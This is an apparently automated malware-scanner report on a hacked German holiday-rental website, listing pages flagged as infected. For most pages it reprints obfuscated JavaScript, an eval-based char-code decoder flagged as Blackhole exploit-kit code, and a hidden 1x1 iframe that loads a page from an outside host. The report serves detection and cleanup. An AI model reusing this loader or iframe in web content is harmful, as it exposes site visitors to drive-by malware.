Malware Scanner report for ferienhaus-wuitschik-ruegen.de

Malicious/Suspicious/Total urls checked: 13/0/15

13 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "ferienhaus-wuitschik-ruegen.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 2/0/2

2 malicious iframes found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ferienhaus-wuitschik-ruegen.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://www.ferienhaus-wuitschik-ruegen.de/	200 OK Content-Length: 31856 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;} if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b ...[1560 bytes skipped]... Antivirus reports: AntiVir JS/Blacole.EB.59 Avast JS:Decode-BHS [Trj] Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP K7AntiVirus Trojan Comodo Exploit.JS.Blacole.DO McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.DD MicroWorld-eScan JS:Exploit.BlackHole.JS McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.AP F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.XN GData JS:Exploit.BlackHole.AP Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.AP Malicious iFrame found. The same iFrame was found in 15 websites. size: 1x1 src: http://lfmonline.de/test/test.php This URL is marked by Google as suspicious <iframe src="http://lfmonline.de/test/test.php" width="1" height="1" frameborder="0">
http://www.ferienhaus-wuitschik-ruegen.de/script.js	200 OK Content-Length: 8170 Content-Type: application/javascript	clean
http://www.ferienhaus-wuitschik-ruegen.de/index.html	200 OK Content-Length: 31856 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;} if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b ...[1560 bytes skipped]... Antivirus reports: AntiVir JS/Blacole.EB.59 Avast JS:Decode-BHS [Trj] Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP K7AntiVirus Trojan Comodo Exploit.JS.Blacole.DO McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.DD MicroWorld-eScan JS:Exploit.BlackHole.JS McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.AP F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.XN GData JS:Exploit.BlackHole.AP Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.AP Malicious iFrame found. The same iFrame was found in 15 websites. size: 1x1 src: http://lfmonline.de/test/test.php This URL is marked by Google as suspicious <iframe src="http://lfmonline.de/test/test.php" width="1" height="1" frameborder="0">
http://www.ferienhaus-wuitschik-ruegen.de/innen.html	200 OK Content-Length: 9005 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;} if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60 ... 1015 bytes are skipped ...2,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"[sp](",");}w=f;s=[];for(i=20-20;-i+590!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.59 Avast JS:Decode-BHS [Trj] Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP K7AntiVirus Trojan Comodo Exploit.JS.Blacole.DO McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.DD MicroWorld-eScan JS:Exploit.BlackHole.JS McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.AP F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.XN GData JS:Exploit.BlackHole.AP Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.AP
http://www.ferienhaus-wuitschik-ruegen.de/aussen.html	200 OK Content-Length: 6924 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;} if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60 ... 1015 bytes are skipped ...2,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"[sp](",");}w=f;s=[];for(i=20-20;-i+590!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.59 Avast JS:Decode-BHS [Trj] Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP K7AntiVirus Trojan Comodo Exploit.JS.Blacole.DO McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.DD MicroWorld-eScan JS:Exploit.BlackHole.JS McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.AP F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.XN GData JS:Exploit.BlackHole.AP Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.AP
http://www.ferienhaus-wuitschik-ruegen.de/lage.html	200 OK Content-Length: 7440 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;} if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60 ... 1015 bytes are skipped ...2,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"[sp](",");}w=f;s=[];for(i=20-20;-i+590!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.59 Avast JS:Decode-BHS [Trj] Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP K7AntiVirus Trojan Comodo Exploit.JS.Blacole.DO McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.DD MicroWorld-eScan JS:Exploit.BlackHole.JS McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.AP F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.XN GData JS:Exploit.BlackHole.AP Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.AP
http://www.ferienhaus-wuitschik-ruegen.de/ausstattung.html	200 OK Content-Length: 7482 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;} if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60 ... 1015 bytes are skipped ...2,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"[sp](",");}w=f;s=[];for(i=20-20;-i+590!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.59 Avast JS:Decode-BHS [Trj] Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP K7AntiVirus Trojan Comodo Exploit.JS.Blacole.DO McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.DD MicroWorld-eScan JS:Exploit.BlackHole.JS McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.AP F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.XN GData JS:Exploit.BlackHole.AP Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.AP
http://www.ferienhaus-wuitschik-ruegen.de/preise.html	200 OK Content-Length: 7061 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;} if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60 ... 1015 bytes are skipped ...2,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"[sp](",");}w=f;s=[];for(i=20-20;-i+590!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.59 Avast JS:Decode-BHS [Trj] Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP K7AntiVirus Trojan Comodo Exploit.JS.Blacole.DO McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.DD MicroWorld-eScan JS:Exploit.BlackHole.JS McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.AP F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.XN GData JS:Exploit.BlackHole.AP Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.AP
http://www.ferienhaus-wuitschik-ruegen.de/kontakt.html	200 OK Content-Length: 6613 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;} if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60 ... 1015 bytes are skipped ...2,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"[sp](",");}w=f;s=[];for(i=20-20;-i+590!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.59 Avast JS:Decode-BHS [Trj] Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP K7AntiVirus Trojan Comodo Exploit.JS.Blacole.DO McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.DD MicroWorld-eScan JS:Exploit.BlackHole.JS McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.AP F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.XN GData JS:Exploit.BlackHole.AP Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.AP
http://www.ferienhaus-wuitschik-ruegen.de/disc.html	200 OK Content-Length: 9098 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;} if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60 ... 1015 bytes are skipped ...2,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"[sp](",");}w=f;s=[];for(i=20-20;-i+590!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.59 Avast JS:Decode-BHS [Trj] Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP K7AntiVirus Trojan Comodo Exploit.JS.Blacole.DO McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.DD MicroWorld-eScan JS:Exploit.BlackHole.JS McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.AP F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.XN GData JS:Exploit.BlackHole.AP Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.AP
http://www.ferienhaus-wuitschik-ruegen.de/test404page.js	404 Not Found Content-Length: 212 Content-Type: text/html	clean
http://www.ferienhaus-wuitschik-ruegen.de/k1.html	200 OK Content-Length: 2267 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;} if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60 ... 1015 bytes are skipped ...2,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"[sp](",");}w=f;s=[];for(i=20-20;-i+590!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.59 Avast JS:Decode-BHS [Trj] Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP K7AntiVirus Trojan Comodo Exploit.JS.Blacole.DO McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.DD MicroWorld-eScan JS:Exploit.BlackHole.JS McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.AP F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.XN GData JS:Exploit.BlackHole.AP Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.AP
http://www.ferienhaus-wuitschik-ruegen.de/k2.html	200 OK Content-Length: 2267 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;} if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60 ... 1015 bytes are skipped ...2,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"[sp](",");}w=f;s=[];for(i=20-20;-i+590!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.59 Avast JS:Decode-BHS [Trj] Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP K7AntiVirus Trojan Comodo Exploit.JS.Blacole.DO McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.DD MicroWorld-eScan JS:Exploit.BlackHole.JS McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.AP F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.XN GData JS:Exploit.BlackHole.AP Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.AP
http://www.ferienhaus-wuitschik-ruegen.de/k3.html	200 OK Content-Length: 2267 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;} if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60 ... 1015 bytes are skipped ...2,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"[sp](",");}w=f;s=[];for(i=20-20;-i+590!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.59 Avast JS:Decode-BHS [Trj] Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP K7AntiVirus Trojan Comodo Exploit.JS.Blacole.DO McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.DD MicroWorld-eScan JS:Exploit.BlackHole.JS McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.AP F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.XN GData JS:Exploit.BlackHole.AP Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.AP
http://www.ferienhaus-wuitschik-ruegen.de/a1.html	200 OK Content-Length: 2276 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;} if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60 ... 1015 bytes are skipped 